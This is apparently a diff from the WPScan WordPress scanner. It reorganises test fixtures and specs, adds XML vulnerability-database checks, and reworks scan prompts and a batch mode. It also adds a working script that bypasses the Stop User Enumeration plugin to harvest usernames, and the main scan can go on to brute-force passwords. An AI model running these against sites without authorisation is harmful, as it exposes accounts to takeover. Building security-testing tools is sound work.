+    "request_timeout": 2000,
+    "connect_timeout": 1000,
+    "max_threads": 20
+}

spec/samples/conf/browser.conf_proxy.json

@@ -0,0 +1,7 @@
+{
+    "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/11.0",
+    "proxy": "127.0.0.1:3038",
+    "cache_ttl": 300,
+    "request_timeout": 2000,
+    "connect_timeout": 1000
+}

spec/samples/conf/browser.conf_proxy_auth.json

@@ -0,0 +1,8 @@
+{
+    "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/11.0",
+    "proxy": "127.0.0.1:3038",
+    "proxy_auth": "user:pass",
+    "cache_ttl": 300,
+    "request_timeout": 2000,
+    "connect_timeout": 1000
+}

spec/samples/conf/browser/browser.conf.json

@@ -1,8 +0,0 @@
-{
-  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
-  "user_agent_mode": "static",
-  "cache_ttl": 300,
-  "request_timeout": 2000,
-  "connect_timeout": 1000,
-  "max_threads": 5
-}

spec/samples/conf/browser/browser.conf_proxy.json

@@ -1,8 +0,0 @@
-{
-  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/11.0",
-  "user_agent_mode": "static",
-  "proxy": "127.0.0.1:3038",
-  "cache_ttl": 300,
-  "request_timeout": 2000,
-  "connect_timeout": 1000
-}

spec/samples/conf/browser/browser.conf_proxy_auth.json

@@ -1,9 +0,0 @@
-{
-  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/11.0",
-  "user_agent_mode": "static",
-  "proxy": "127.0.0.1:3038",
-  "proxy_auth": "user:pass",
-  "cache_ttl": 300,
-  "request_timeout": 2000,
-  "connect_timeout": 1000
-}

spec/shared_examples/browser/options.rb

@@ -71,69 +71,6 @@ shared_examples 'Browser::Options' do
     end
   end
 
-  describe '#user_agent_mode= & #user_agent_mode' do
-    # Testing all valid modes
-    Browser::USER_AGENT_MODES.each do |user_agent_mode|
-      it "sets & returns #{user_agent_mode}" do
-        browser.user_agent_mode = user_agent_mode
-        browser.user_agent_mode.should === user_agent_mode
-      end
-    end
-
-    it 'sets the mode to "static" if nil is given' do
-      browser.user_agent_mode = nil
-      browser.user_agent_mode.should === 'static'
-    end
-
-    it 'raises an error if the mode is not valid' do
-      expect { browser.user_agent_mode = 'invalid-mode' }.to raise_error
-    end
-  end
-
-  describe '#user_agent= & #user_agent' do
-    let(:available_user_agents) { %w{ ua-1 ua-2 ua-3 ua-4 ua-6 ua-7 ua-8 ua-9 ua-10 ua-11 ua-12 ua-13 ua-14 ua-15 ua-16 ua-17 } }
-
-    context 'when static mode' do
-      it 'returns the same user agent' do
-        browser.user_agent      = 'fake UA'
-        browser.user_agent_mode = 'static'
-
-        (1..3).each do
-          browser.user_agent.should === 'fake UA'
-        end
-      end
-    end
-
-    context 'when semi-static mode' do
-      it 'chooses a random user_agent in the available_user_agents array and always return it' do
-        browser.available_user_agents = available_user_agents
-        browser.user_agent            = 'Firefox 11.0'
-        browser.user_agent_mode       = 'semi-static'
-
-        user_agent = browser.user_agent
-        user_agent.should_not === 'Firefox 11.0'
-        available_user_agents.include?(user_agent).should be_true
-
-        (1..3).each do
-          browser.user_agent.should === user_agent
-        end
-      end
-    end
-
-    context 'when random' do
-      it 'returns a random user agent each time' do
-        browser.available_user_agents = available_user_agents
-        browser.user_agent_mode       = 'random'
-
-        ua_1 = browser.user_agent
-        ua_2 = browser.user_agent
-        ua_3 = browser.user_agent
-
-        fail if ua_1 === ua_2 and ua_2 === ua_3
-      end
-    end
-  end
-
   describe 'proxy=' do
     let(:exception) { 'Invalid proxy format. Should be [protocol://]host:port.' }
 
@@ -185,7 +122,7 @@ shared_examples 'Browser::Options' do
         end
 
         context 'valid format' do
-           it 'sets the auth' do
+          it 'sets the auth' do
             @proxy_auth = 'username:passwd'
             @expected   = @proxy_auth
           end

spec/shared_examples/wp_target/wp_readme.rb

@@ -27,7 +27,6 @@ shared_examples 'WpTarget::WpReadme' do
       @expected = true
     end
 
-    # http://code.google.com/p/wpscan/issues/detail?id=108
     it 'returns true even if the readme.html is not in english' do
       @stub     = { status: 200, body: File.new(fixtures_dir + '/readme-3.3.2-fr.html') }
       @expected = true

spec/spec_helper.rb

@@ -15,7 +15,7 @@ SPEC_FIXTURES_CONF_DIR        = SPEC_FIXTURES_DIR + '/conf' # FIXME Remove it
 SPEC_FIXTURES_WP_VERSIONS_DIR = SPEC_FIXTURES_DIR + '/wp_versions'
 
 redefine_constant(:CACHE_DIR, SPEC_DIR + '/cache')
-redefine_constant(:CONF_DIR, SPEC_FIXTURES_DIR + '/conf/browser') # FIXME Remove the /browser
+redefine_constant(:CONF_DIR, SPEC_FIXTURES_DIR + '/conf')
 
 MODELS_FIXTURES = SPEC_FIXTURES_DIR + '/common/models'
 COLLECTIONS_FIXTURES = SPEC_FIXTURES_DIR + '/common/collections'

spec/xml_checks_spec.rb

@@ -77,3 +77,38 @@ describe 'Well formed XML checks' do
     @file = LOCAL_FILES_FILE
   end
 end
+
+describe 'XML content' do
+  before :all do
+    @vuln_plugins = xml(PLUGINS_VULNS_FILE)
+    @vuln_themes = xml(THEMES_VULNS_FILE)
+  end
+
+  after :each do
+    @result.should have(0).items, "Items:\n#{@result.join("\n")}"
+  end
+
+  it 'each plugin vuln needs a type node' do
+    @result = @vuln_plugins.xpath('//vulnerability[not(type)]/title/text()').map(&:text)
+  end
+
+  it 'each theme vuln needs a type node' do
+    @result = @vuln_themes.xpath('//vulnerability[not(type)]/title/text()').map(&:text)
+  end
+
+  it 'each plugin vuln needs a title node' do
+    @result = @vuln_plugins.xpath('//vulnerability[not(title)]/../@name').map(&:text)
+  end
+
+  it 'each theme vuln needs a title node' do
+    @result = @vuln_themes.xpath('//vulnerability[not(title)]/../@name').map(&:text)
+  end
+
+  it 'each plugin vuln needs a references node' do
+    @result = @vuln_plugins.xpath('//vulnerability[not(references)]/title/text()').map(&:text)
+  end
+
+  it 'each theme vuln needs a references node' do
+    @result = @vuln_themes.xpath('//vulnerability[not(references)]/title/text()').map(&:text)
+  end
+end

stop_user_enumeration_bypass.rb

@@ -0,0 +1,73 @@
+#!/usr/bin/env ruby
+# encoding: UTF-8
+#
+#
+# Script based on http://seclists.org/fulldisclosure/2014/Feb/3
+
+require File.join(File.dirname(__FILE__), 'lib/wpscan/wpscan_helper')
+
+@opts = {
+  ids: 1..10,
+  verbose: false,
+  user_agent: 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0'
+}
+
+parser = OptionParser.new('Usage: ./stop_user_enumeration_bypass.rb <Target URL> [options]', 35) do |opts|
+  opts.on('--proxy PROXY', 'Proxy to use') do |proxy|
+    @opts[:proxy] = proxy
+  end
+
+  opts.on('--auth Username:Password', 'Credentials to use if Basic/NTLM auth') do |creds|
+    @opts[:creds] = creds
+  end
+
+  opts.on('--ids START-END', 'The ids to check, default is 1-10') do |ids|
+    @opts[:ids] = Range.new(*ids.split('-').map(&:to_i))
+  end
+
+  opts.on('--user-agent UA', 'The user-agent to use') do |ua|
+    @opts[:user_agent] = ua
+  end
+
+  opts.on('--verbose', '-v', 'Verbose Mode') do
+    @opts[:verbose] = true
+  end
+end
+
+begin
+  parser.parse!
+
+  fail "#{red('The target URL must be supplied')}\n\n#{parser}" unless ARGV[0]
+
+  uri = URI.parse(add_trailing_slash(add_http_protocol(ARGV[0])))
+
+  request_params = {
+    proxy: @opts[:proxy],
+    userpwd: @opts[:creds],
+    headers: { 'User-Agent' => @opts[:user_agent] },
+    followlocation: true,
+    ssl_verifypeer: false,
+    ssl_verifyhost: 2
+  }
+
+  detected_users = WpUsers.new
+
+  @opts[:ids].each do |user_id|
+    user = WpUser.new(uri, id: user_id)
+
+    if user.exists_from_response?(Typhoeus.post(uri, request_params.merge(body: { author: user_id })))
+      detected_users << user
+    end
+  end
+
+  puts 'Usernames found:'
+  detected_users.output
+rescue => e
+  puts e.message
+
+  if @opts[:verbose]
+    puts red('Trace:')
+    puts red(e.backtrace.join("\n"))
+  end
+  exit(1)
+end

wpscan.rb

@@ -18,6 +18,9 @@ def main
       raise('No argument supplied')
     end
 
+    # Define a global variable
+    $COLORSWITCH = wpscan_options.no_color
+
     if wpscan_options.help
       help()
       usage()
@@ -38,8 +41,8 @@ def main
         end
         puts @updater.update()
       else
-        puts 'Svn / Git not installed, or wpscan has not been installed with one of them.'
-        puts 'Update aborted'
+        puts '[i] Svn / Git not installed, or wpscan has not been installed with one of them.'
+        puts "#{red('[!]')} Update aborted"
       end
       exit(0)
     end
@@ -63,22 +66,24 @@ def main
       end
     end
 
-    redirection = wp_target.redirection
-    if redirection
+    # Remote website has a redirection?
+    if (redirection = wp_target.redirection)
       if wpscan_options.follow_redirection
         puts "Following redirection #{redirection}"
-        puts
       else
-        puts "The remote host tried to redirect us to: #{redirection}"
-        print 'Do you want follow the redirection ? [y/n] '
+        puts "#{blue('[i]')} The remote host tried to redirect to: #{redirection}"
+        print '[?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N]'
       end
-
-      if wpscan_options.follow_redirection or Readline.readline =~ /^y/i
-        wpscan_options.url = redirection
-        wp_target = WpTarget.new(redirection, wpscan_options.to_h)
-      else
-        puts 'Scan aborted'
-        exit(0)
+      if wpscan_options.follow_redirection || !wpscan_options.batch
+        if wpscan_options.follow_redirection || (input = Readline.readline) =~ /^y/i
+          wpscan_options.url = redirection
+          wp_target = WpTarget.new(redirection, wpscan_options.to_h)
+        else
+          if input =~ /^a/i
+            puts 'Scan aborted'
+            exit(0)
+          end
+        end
       end
     end
 
@@ -89,7 +94,7 @@ def main
     # Remote website is wordpress?
     unless wpscan_options.force
       unless wp_target.wordpress?
-        raise 'The remote website is up, but does not seem to be running WordPress.'
+        raise "#{red('[!]')} The remote website is up, but does not seem to be running WordPress."
       end
     end
 
@@ -100,8 +105,8 @@ def main
     unless wp_target.wp_plugins_dir_exists?
       puts "The plugins directory '#{wp_target.wp_plugins_dir}' does not exist."
       puts 'You can specify one per command line option (don\'t forget to include the wp-content directory if needed)'
-      print 'Continue? [y/n] '
-      unless Readline.readline =~ /^y/i
+      puts '[?] Continue? [Y]es [N]o, default: [N]'
+      if wpscan_options.batch || Readline.readline !~ /^y/i
         exit(0)
       end
     end
@@ -138,7 +143,7 @@ def main
     end
 
     wp_target.config_backup.each do |file_url|
-      puts red("[!] A wp-config.php backup file has been found in: '#{file_url}'")
+      puts "#{red('[!]')} A wp-config.php backup file has been found in: '#{file_url}'"
     end
 
     if wp_target.search_replace_db_2_exists?
@@ -148,7 +153,7 @@ def main
     wp_target.interesting_headers.each do |header|
       output = "#{green('[+]')} Interesting header: "
 
-      if header[1].class == Array 
+      if header[1].class == Array
         header[1].each do |value|
           puts output + "#{header[0]}: #{value}"
         end
@@ -182,7 +187,7 @@ def main
 
     enum_options = {
       show_progression: true,
-      exclude_content:  wpscan_options.exclude_content_based
+      exclude_content: wpscan_options.exclude_content_based
     }
 
     if wp_version = wp_target.version(WP_VERSIONS_FILE)
@@ -212,7 +217,7 @@ def main
 
       wp_plugins = WpPlugins.passive_detection(wp_target)
       if !wp_plugins.empty?
-        puts " |  #{wp_plugins.size} plugins found:"
+        puts " | #{wp_plugins.size} plugins found:"
 
         wp_plugins.output(wpscan_options.verbose)
       else
@@ -294,6 +299,11 @@ def main
       puts
       puts "#{green('[+]')} Enumerating usernames ..."
 
+      if wp_target.has_plugin?('stop-user-enumeration')
+        puts "#{red('[!]')} Stop User Enumeration plugin detected, results might be empty. " \
+             "However a bypass exists, see stop_user_enumeration_bypass.rb in #{File.expand_path(File.dirname(__FILE__))}"
+      end
+
       wp_users = WpUsers.aggressive_detection(wp_target,
         enum_options.merge(
           range: wpscan_options.enumerate_usernames_range,
@@ -327,12 +337,12 @@ def main
         protection_plugin = wp_target.login_protection_plugin()
 
         puts
-        puts "The plugin #{protection_plugin.name} has been detected. It might record the IP and timestamp of every failed login and/or prevent brute forcing altogether. Not a good idea for brute forcing!"
-        print "[?] Do you want to start the brute force anyway ? [y/n] "
+        puts "#{red('[!]')} The plugin #{protection_plugin.name} has been detected. It might record the IP and timestamp of every failed login and/or prevent brute forcing altogether. Not a good idea for brute forcing!"
+        puts '[?] Do you want to start the brute force anyway ? [Y]es [N]o, default: [N]'
 
-        bruteforce = false if Readline.readline !~ /^y/i
+        bruteforce = false if wpscan_options.batch || Readline.readline !~ /^y/i
       end
-      puts
+
       if bruteforce
         puts "#{green('[+]')} Starting the password brute forcer"
 
@@ -347,14 +357,14 @@ def main
           wp_users.output(show_password: true, margin_left: ' ' * 2)
         end
       else
-        puts "Brute forcing aborted"
+        puts "#{red('[!]')} Brute forcing aborted"
       end
     end
 
     stop_time   = Time.now
     elapsed     = stop_time - start_time
     used_memory = get_memory_usage - start_memory
-    
+
     puts
     puts green("[+] Finished: #{stop_time.asctime}")
     puts green("[+] Memory used: #{used_memory.bytes_to_human}")
@@ -362,16 +372,21 @@ def main
     exit(0) # must exit!
 
   rescue SystemExit, Interrupt
-    
+
   rescue => e
-    if e.backtrace[0] =~ /main/
-      puts red(e.message)
-    else
-      puts red("[ERROR] #{e.message}")
-      puts red("Trace:")
+    puts
+    puts red(e.message)
+
+    if wpscan_options && wpscan_options.verbose
+      puts red('Trace:')
       puts red(e.backtrace.join("\n"))
     end
     exit(1)
+  ensure
+    # Ensure a clean abort of Hydra
+    # See https://github.com/wpscanteam/wpscan/issues/461#issuecomment-42735615
+    Browser.instance.hydra.abort
+    Browser.instance.hydra.run
   end
 end